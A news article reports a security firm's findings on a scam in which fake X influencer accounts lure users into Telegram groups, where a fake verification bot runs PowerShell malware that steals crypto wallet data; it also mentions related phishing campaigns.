Scammers Use Telegram Verification Bots to Spread Crypto Malware
Date: 2024-12-11 Author: Oliver Abernathy Categories: BUSINESS
Scammers have begun using a combination of social engineering and fake Telegram verification bots to spread malware that aims to steal cryptocurrency from wallets, according to blockchain security firm Scam Sniffer.
In a December 10 post, Scam Sniffer reported that the attackers create fake accounts on the X platform (formerly Twitter), posing as well-known crypto influencers. They then invite users to Telegram groups, promising useful information about investments.
Once in such a group, users are asked to undergo verification through a fake bot called “OfficiaISafeguardBot.” This bot creates the appearance of urgency by limiting the time for verification. Once activated, the bot runs malicious PowerShell code that installs software to hack systems and steal crypto wallet data.
According to Scam Sniffer, there have already been numerous cases where such software was used to steal private keys. The company also noted that all known incidents with this scheme involve the use of a fake verification bot.
“It is not yet known whether other malicious bots exist. However, it is obvious that it is easy for fraudsters to fake other bots and use this scheme further,” Scam Sniffer said.
The experts also noted that malware targeting ordinary users has been around for a long time. However, its development and distribution are becoming increasingly complex and large-scale. Successful scams stimulate the development of a “fraud service”, when the creators of cryptocurrency theft software provide their tools for rent to other attackers.
Scam Sniffer emphasized that while there have been cases of malware being distributed via Telegram and impersonating famous people, this is the first time that a combination of fake X accounts, fake Telegram channels, and malicious bots has been observed.
The company’s experts have also recorded an increase in the number of scammers posing as other X users. On average, about 300 fake accounts are detected daily in December, while in November their number was about 160 per day.
At least two people have reportedly already lost over $3 million by clicking on fake links and signing transactions offered through such accounts.
At the same time, Cado Security Labs warned of a new campaign targeting Web3 employees through fake meeting apps. These apps distribute malware by stealing credentials from websites, apps, and cryptocurrency wallets.
Security platform Cyvers added that December could be the peak month for phishing attacks as hackers look to take advantage of the surge in online transactions ahead of the holiday season.
